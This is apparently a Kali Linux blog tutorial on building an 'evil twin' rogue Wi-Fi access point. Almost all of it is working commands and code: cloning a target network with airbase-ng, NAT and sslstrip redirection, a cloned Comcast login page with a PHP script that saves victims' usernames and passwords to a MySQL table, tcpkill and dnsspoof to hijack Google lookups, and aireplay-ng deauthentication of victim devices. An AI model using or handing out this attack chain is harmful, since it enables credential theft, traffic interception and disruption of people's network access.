layout | title | date | categories | tags | author | identifier | comments
---|---|---|---|---|---|---|---
post | Evil Wireless Rogue Access Point | 2016-09-16 16:05:45 -0400 | kali | kali-linux aircrack-ng mitm | Matrixfox | 113689429 | true
A rogue access point is a wireless access point that looks like a legitimate wireless router but is actually hosted from an attacker's machine. Every client that joins it has its traffic routed through the attacker, which makes this a man-in-the-middle attack used for gathering intelligence. In the setup below, dnsspoof and tcpkill cut the victim off from a real web page and redirect them to a cloned fake one, while sslstrip and driftnet snoop on the traffic that arrives on the rogue interface.
```
Internet --> Access Point --> Attacker --> Wireless
                                             |
                                             |_ You
```
Take note of the default gateway address of the access point you are currently connected to; the NAT rules later need it.

```sh
ip route | grep default
```

It is also wise to note the machine's network interfaces before anything gets renamed by airmon-ng:

```sh
ifconfig
iwconfig
```
Since this is a fresh install, we need to edit some network system files. It is a good idea to back up a file before editing it.

Make sure isc-dhcp-server is installed and up to date:

```sh
apt-get install isc-dhcp-server
```

Once installed, edit the `isc-dhcp-server` file in the `/etc/default` directory:

```sh
nano /etc/default/isc-dhcp-server
```

Uncomment `DHCPDv4_CONF` and `DHCPDv4_PID`, and list the interface that should serve DHCP requests. That should be `at0` only: `at0` is the interface airbase-ng creates for the rogue network, and you do not want to answer DHCP requests on `eth0` or `wlan0`, which belong to someone else's network. (Newer versions of the package name the variable `INTERFACESv4` instead of `INTERFACES`; set whichever one your file has.)

```
DHCPDv4_CONF=/etc/dhcp/dhcpd.conf
DHCPDv4_PID=/var/run/dhcpd.pid
INTERFACES="at0"
```

If you are not sure about your network interfaces, `ifconfig` and `iwconfig` list them. You will not see `at0` until airbase-ng is running.

If `dhcpd.leases` is missing, create it; dhcpd refuses to start without it:

```sh
touch /var/lib/dhcp/dhcpd.leases
```
```sh
nano /etc/dhcp/dhcpd.conf
```

Delete everything that is commented out with hash signs, then put the following in `dhcpd.conf`:

```
# Use Google public DNS server (or use faster values that your internet provider gave you!):
#option domain-name-servers 8.8.8.8, 8.8.4.4;

# Show that we want to be the only DHCP server in this network:
authoritative;
default-lease-time 600;
max-lease-time 7200;

# Set up our desired subnet:
subnet 10.0.0.0 netmask 255.255.255.0 {
  option routers 10.0.0.1;
  option subnet-mask 255.255.255.0;
  option domain-name-servers 10.0.0.1;
  range 10.0.0.20 10.0.0.50;
}
```

When a device connects to the fake access point, dhcpd hands it a private address out of the range `10.0.0.20` to `10.0.0.50`. The order in which addresses are handed out is up to dhcpd, so check `/var/lib/dhcp/dhcpd.leases` rather than assuming the first client got `.21`. `option routers` and `option domain-name-servers` both point at `10.0.0.1`, the address we give `at0` later, so every client's traffic and DNS lookups go through the attacker. If you would rather hand clients a public resolver directly, uncomment the `option domain-name-servers 8.8.8.8, 8.8.4.4;` line at the top.
```sh
nano /etc/ettercap/etter.conf
```

In the `[privs]` section change `ec_uid` and `ec_gid` from the default 65534 (nobody) to 0, so ettercap keeps root after startup and can run the iptables redirect commands. Then uncomment the two lines in the "if you use iptables" section. The `$` at the end of those two lines below is nano marking that the line is wider than the terminal, not part of the command; uncomment the whole line as it stands in your file.

```
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %por$
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %po$
```
After the network system files are edited, put the wireless interface into monitor mode. There are two ways to do it: airmon-ng, or the manual iwconfig commands if your card is stubborn. Either way, dhclient and the other processes that fight over the card (NetworkManager, wpa_supplicant) need to be killed first; `airmon-ng check kill` does that for you. Note the interface name you end up with: the manual method keeps the name (`wlan0`), while airmon-ng renames the card to `wlan1mon` (or `wlan0mon`), and that is the name every airodump-ng, airbase-ng and aireplay-ng command below must use. The rest of this post uses `wlan1mon`.

Manual:

```sh
pkill dhclient
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
```

With airmon-ng:

```sh
airmon-ng check
airmon-ng check kill
airmon-ng start wlan1
```
Once the card is in monitor mode, you may want to raise its transmission power. Increasing power makes the rogue access point look closer (stronger) to the victim than their real router, so their device prefers it and they assume it is their own. A word of caution: every country caps transmit power, exceeding that cap is illegal (in the United States as anywhere else), and some cards such as the Alfa AWUS036NHA have their regulatory domain fixed in firmware and will refuse to go higher. The default is 20 dBm (100 mW). `iw reg set` only changes the regulatory domain the kernel enforces, which determines the maximum power the driver will accept; it does not by itself change the power level.

```sh
ifconfig wlan1mon down
iw reg set US
ifconfig wlan1mon up
```

How an access point announces itself: it transmits beacon frames many times a second, and a client sees each nearby access point with a signal strength that falls off with distance until the beacons drop out of range entirely. Clients generally prefer the strongest signal for a known network, which is what the power increase exploits. If you want a first-hand look, download Architecture of Radio for iOS by Richard Vijgen.
Open another terminal and search for nearby networks:

```sh
airodump-ng wlan1mon
```

Copy the target's MAC address (BSSID) into `-a`, its network name (ESSID) into `-e`, and run on the same channel with `-c`:

```sh
airbase-ng -c 6 -a 00:11:22:33:44:55 -e "HOME-1234" wlan1mon
```

This broadcasts an open network with the same name and BSSID as the real one. One caveat: most devices store the security type along with the saved network, so a phone that knows `HOME-1234` as a WPA2 network will usually not join an open clone of it on its own; the victim may have to pick it by hand after being knocked off their real network.
These settings need to be run each time the system restarts, so save them in a bash script.

While airbase-ng is running, open another terminal and run the following. The address and netmask must match the DHCP server config:

```sh
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
```

airbase-ng created the `at0` interface; these commands give it the gateway address `10.0.0.1` that `dhcpd.conf` hands out in `option routers`, and add the route for the subnet the DHCP leases come from. The reduced MTU is a common workaround for fragmentation problems on the tap interface.
First, get your network gateway IP from earlier and replace `192.168.1.1` below with it.

```sh
iptables -t nat -A PREROUTING -i at0 -p udp --dport 53 -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -i at0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000
```

These rules route and rewrite the victims' traffic. The first forwards their DNS queries (which the DHCP lease points at `10.0.0.1`) on to the real gateway, the MASQUERADE rule hides the `10.0.0.0/24` addresses behind `eth0`, and the last rule sends every plain HTTP connection to port 10000, the default listening port chosen by the sslstrip developers. Both PREROUTING rules are limited to `-i at0`; without that, the DNAT would also rewrite traffic arriving on `eth0`, and without `--dport 53` it would rewrite every UDP packet, not just DNS.

Turn on IP forwarding and start the DHCP server on `at0`:

```sh
echo 1 > /proc/sys/net/ipv4/ip_forward
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
```

Start dhcpd either this way or with `service isc-dhcp-server restart`, not both; two copies of dhcpd on the same interface will fight over the leases file. The pid file is `dhcpd.pid`, the one named in `/etc/default/isc-dhcp-server`, not dhclient's.
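The at0, iptables, forwarding and dhcpd steps above collected into one script. This is an added example, not a script from the original post: it uses `ip` and `sysctl` in place of `ifconfig` and the `/proc` write, scopes the rewriting rules to `at0`, and adds an ESTABLISHED,RELATED rule so replies can come back under a DROP forward policy. The interface names, addresses and sslstrip port are the ones used above and are assumptions you should change to match your own setup. Run it without arguments to print the rules it would apply, and with `apply` as root to apply them.

```shell
#!/bin/sh
# Rogue AP plumbing: at0 address, NAT, DNS forwarding and the sslstrip redirect.
set -eu

# Assumed values (change to match your setup and your dhcpd.conf):
AP_IF="at0"               # tap interface created by airbase-ng
AP_ADDR="10.0.0.1"        # "option routers" in dhcpd.conf
UPLINK_IF="eth0"          # interface with real Internet access
UPLINK_GW="192.168.1.1"   # default gateway from `ip route | grep default`
SSLSTRIP_PORT="10000"     # port sslstrip listens on (-l)

# Print the nat/filter rules, one per line. Rewriting rules are scoped with
# -i "$AP_IF" so only victim traffic is touched, never packets arriving on the uplink.
firewall_rules() {
    cat <<EOF
iptables -t nat -A PREROUTING -i $AP_IF -p udp --dport 53 -j DNAT --to-destination $UPLINK_GW
iptables -t nat -A PREROUTING -i $AP_IF -p tcp --dport 80 -j REDIRECT --to-ports $SSLSTRIP_PORT
iptables -t nat -A POSTROUTING -o $UPLINK_IF -j MASQUERADE
iptables -A FORWARD -i $AP_IF -o $UPLINK_IF -j ACCEPT
iptables -A FORWARD -i $UPLINK_IF -o $AP_IF -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
EOF
}

# Number of rules firewall_rules produces (sanity check before applying).
rule_count() {
    firewall_rules | wc -l | tr -d ' '
}

apply_all() {
    # at0 only exists while airbase-ng is running.
    ip link show "$AP_IF" >/dev/null 2>&1 || { echo "$AP_IF missing: start airbase-ng first" >&2; exit 1; }
    ip addr flush dev "$AP_IF"
    ip addr add "$AP_ADDR/24" dev "$AP_IF"
    ip link set "$AP_IF" up mtu 1400
    sysctl -w net.ipv4.ip_forward=1 >/dev/null
    # Reset only the chains we use; FORWARD defaults to DROP and the rules above open it.
    iptables -t nat -F PREROUTING
    iptables -t nat -F POSTROUTING
    iptables -F FORWARD
    iptables -P FORWARD DROP
    firewall_rules | while IFS= read -r rule; do
        $rule    # unquoted on purpose: word-split into command and arguments
    done
    # Exactly one dhcpd, on at0 only; do not also start the isc-dhcp-server service.
    touch /var/lib/dhcp/dhcpd.leases
    dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid "$AP_IF"
}

case "${1:-}" in
    apply) apply_all ;;
    *)     firewall_rules ;;
esac
```

Printing the rules before applying them is the cheap check that the interface names and gateway landed where you expect; `rule_count` exists so a script wrapping this one can refuse to run if the rule list is empty or mangled.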
Unfortunately, this next part requires a bit of programming knowledge. Oh, what did you say? You fed yourself through college as a freelance web developer? Let's get started…
Start by cloning the Comcast login page with httrack:

```sh
httrack https://login.comcast.net -O /tmp/example
```

If everything went okay, move the files from the `/tmp` folder to the Apache web server directory:

```sh
root@kali:~$ cd /tmp/example
root@kali:/tmp/example$ mv * /var/www/html
root@kali:/tmp/example$ cd /var/www/html/login.comcast.net
root@kali:/var/www/html/login.comcast.net$ cp login.html ../index.html
```

Edit the newly copied `index.html` so the form posts back to our PHP file:

```sh
nano /var/www/html/index.html
```

Press CTRL + W, type `form` and press enter to find the HTML form element. Replace `action="https://login.comcast.net/login"` with `action="upgrade.php"`:

```html
<form name="signin" action="upgrade.php" method="post" onsubmit="return login.onSubmit()">
```

If the cloned page's JavaScript did not come across completely and the `onsubmit` handler blocks the submission, remove the `onsubmit` attribute so the browser posts the form normally.

Take note of the `name` attributes of the username and password inputs, `user` and `passwd`; those are the POST field names we are going to insert into our database. Essentially, we are building a login page that records whatever is typed into it. Right-click and inspect element (Q) on the input fields, or search for `input` inside `index.html`.
Create the `upgrade.php` file inside the `/var/www/html` folder:

```sh
nano /var/www/html/upgrade.php
```

This script is written for PHP 7. The submitted values go into the INSERT as bound parameters rather than being pasted into the SQL string, so a quote character in a victim's password cannot break the statement or inject into your own harvesting database. Whether the insert succeeds or not, the visitor is sent back to the login page.

```php
<?php
$host = "localhost";
$username = "root";
$database = "harvest_comcast";

// Open connection with an empty password (the root account on a fresh MySQL install).
$conn = new mysqli($host, $username, "", $database);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

// HTML input name elements from earlier; default to empty strings if absent.
$htmlFormUser   = $_POST['user'] ?? '';
$htmlFormPasswd = $_POST['passwd'] ?? '';

// Prepared INSERT: the victim's credentials are bound as parameters, never as SQL text.
$stmt = $conn->prepare("INSERT INTO xfinity_accounts (account, password) VALUES (?, ?)");
if ($stmt !== false) {
    $stmt->bind_param("ss", $htmlFormUser, $htmlFormPasswd);
    $stmt->execute();   // success or failure, the redirect below is the same
    $stmt->close();
}

// Close connection
$conn->close();

// Send the visitor back to the login page either way.
header("Location: index.html");
exit;
?>
```
If Apache and MySQL are not running, start them:

```sh
service apache2 start
service mysql start
```

Now enable PHP 7.0 with a2enmod and restart Apache:

```sh
a2enmod php7.0
service apache2 restart
```

Start a MySQL session as root, create a database named `harvest_comcast`, then create a table named `xfinity_accounts` inside it. The table has two columns, `account` and `password`, both `varchar(64)`:

```sh
root@kali:~$ mysql -u root
```

```sql
mysql> create database harvest_comcast;
mysql> use harvest_comcast;
mysql> create table xfinity_accounts(account varchar(64), password varchar(64));
```

To test the database and table, insert a demo account and password:

```sql
mysql> insert into xfinity_accounts(account, password) values ("username", "123456");
```

Make sure a database is selected, then print the table contents:

```sql
mysql> select * from xfinity_accounts;
```

One caveat: `upgrade.php` connects as `root` with an empty password. That works on an install where the MySQL root account has no password, but newer Kali releases ship MariaDB with the root account authenticated by `unix_socket`, in which case the Apache user cannot log in as root at all and the script dies with a connection error. If that happens, create a separate MySQL user that only has INSERT on `xfinity_accounts` and put its credentials in `upgrade.php` instead.
Open Firefox and test the local web server by hand. Make sure `upgrade.php` is inserting into the MySQL database. Expect some junk rows, since nothing verifies the credentials; the redirect loop back to the login page is meant to make the user think they mistyped and enter their credentials again.
No matter which website the victim visits, sslstrip can harvest accounts from any login form it manages to downgrade to plain HTTP.

Start SSL stripping on the port the iptables REDIRECT rule points at. `-l` sets the listening port (10000 is the default anyway), `-f` serves a lock favicon, `-p` logs only POST data, and `-k` kills existing sessions so the victim has to log in again:

```sh
sslstrip -f -p -k -l 10000
```

Open another terminal and start Ettercap on the newly created interface, sniffing only (`-p` disables ARP poisoning and `-u` keeps it unoffensive; everything already passes through `at0`):

```sh
ettercap -p -u -T -q -i at0
```

Driftnet is optional. If you are running in a virtual machine, a login prompt may appear on your screen; just close it without entering your credentials, and driftnet should still work:

```sh
driftnet -i at0
```
Kill the victim's access to Google with tcpkill. When they try to search for something, the connection is torn down and dnsspoof sends them to the fake login page on Apache instead. tcpkill listens on the default interface, so `eth0` is put into promiscuous mode here; passing `-i at0` instead watches the rogue network directly and makes the promiscuous step unnecessary.

```sh
ifconfig eth0 promisc
tcpkill -9 host www.google.com
```

Edit the hosts file inside the `/etc` folder:

```sh
nano /etc/hosts
```

Underneath the existing entries in `/etc/hosts`, add `www.google.com` pointing at our web server. Victims are on `10.0.0.0/24`, so the address they reach is `10.0.0.1` on `at0`; since Apache listens on all interfaces, the machine's LAN address (`192.168.1.100` in the original setup) also works once forwarding is on.

```
10.0.0.1 www.google.com
```

Take the network interface out of promiscuous mode, then run dnsspoof on `at0` with the edited hosts file. dnsspoof answers any query it sees for a name in that file, racing the real reply:

```sh
ifconfig eth0 -promisc
dnsspoof -i at0 -f /etc/hosts
```

A separate hosts file containing only the names you want to spoof is cleaner than reusing `/etc/hosts`, which also carries the `localhost` and IPv6 entries.
Open another terminal and run airodump-ng locked to the target network; replace the BSSID with the router's MAC address:

```sh
airodump-ng -c 6 --bssid 00:11:22:33:44:55 wlan1mon
```

Deauthenticate a device off its network. Replace `-c 00:01:02:03:04:05` with the MAC address of the targeted device (a station airodump-ng lists under that BSSID):

```sh
aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 00:01:02:03:04:05 wlan1mon
```

Let's break down this command. `-0 5` is the short form of `--deauth 5`: send five rounds of deauthentication frames (a count of 0 would mean keep sending until stopped). The router's BSSID is passed with `-a 00:11:22:33:44:55`, matching the router's MAC address from before. Lastly, `-c 00:01:02:03:04:05` is the station, the MAC address of the victim's device. The interface must be the same monitor-mode name used everywhere else (`wlan1mon`). Deauthentication only works against networks that do not use 802.11w protected management frames; a client on a PMF-protected network ignores the forged frames.

When a device gets deauthenticated from its network, it looks for the known network again and, if the rogue access point is the stronger signal and the device is willing to join it, reconnects to the rogue access point instead. The DHCP server assigns it an address from the `10.0.0.20` to `10.0.0.50` range. With sslstrip running alongside tcpkill, there is a chance you will harvest other passwords too; check the `sslstrip.log` file created in the directory where sslstrip was run.
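To see who has actually taken a lease from the rogue access point, read `dhcpd.leases`. The script below is an added example, not from the original post, and the leases file it writes is constructed in the format dhcpd uses rather than a real capture. The point it shows is that dhcpd appends a new `lease { }` block on every renewal or expiry, so the last block for an address is the one that counts.

```shell
#!/bin/sh
# List the clients currently holding a lease from the rogue AP's dhcpd.
# Usage: ./leases.sh /var/lib/dhcp/dhcpd.leases
set -eu

# Print "IP MAC hostname" for each address whose newest lease block is active.
# dhcpd.leases is append-only, so a later block for the same IP replaces the earlier one.
active_leases() {
    awk '
        /^lease /                  { ip = $2; mac = "-"; host = "-"; state = "" }
        /^[ \t]*binding state/     { state = $3; sub(/;$/, "", state) }
        /hardware ethernet/        { mac = $3; sub(/;$/, "", mac) }
        /client-hostname/          { host = $2; gsub(/[";]/, "", host) }
        /^}/                       { if (state == "active") act[ip] = mac " " host; else delete act[ip] }
        END                        { for (ip in act) print ip, act[ip] }
    ' "$1" | sort
}

# Constructed sample in the format dhcpd writes (not a real capture):
# .21 leased, expired, then leased again; .22 active with no hostname; .20 released.
write_sample_leases() {
    cat > "$1" <<'EOF'
lease 10.0.0.21 {
  starts 5 2016/09/16 20:05:45;
  ends 5 2016/09/16 20:15:45;
  binding state free;
  hardware ethernet 00:01:02:03:04:05;
  client-hostname "iPhone";
}
lease 10.0.0.22 {
  starts 5 2016/09/16 20:06:10;
  ends 5 2016/09/16 20:16:10;
  binding state active;
  next binding state free;
  hardware ethernet aa:bb:cc:dd:ee:ff;
}
lease 10.0.0.20 {
  starts 5 2016/09/16 20:00:00;
  ends 5 2016/09/16 20:10:00;
  binding state free;
  hardware ethernet 11:22:33:44:55:66;
}
lease 10.0.0.21 {
  starts 5 2016/09/16 20:20:00;
  ends 5 2016/09/16 20:30:00;
  binding state active;
  next binding state free;
  hardware ethernet 00:01:02:03:04:05;
  client-hostname "iPhone";
}
EOF
}

if [ -n "${1:-}" ]; then
    active_leases "$1"
fi
```

Against the sample this prints two lines, `10.0.0.21` for the iPhone and `10.0.0.22` with no hostname; `10.0.0.20` is dropped because its newest block is `free`, and the stale first block for `.21` is overridden by the later active one.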
- Understanding the network you are on.
- Accessing PHP, Apache and isc-dhcp-server Logs.
- Make a test PHP script, and use the terminal php command.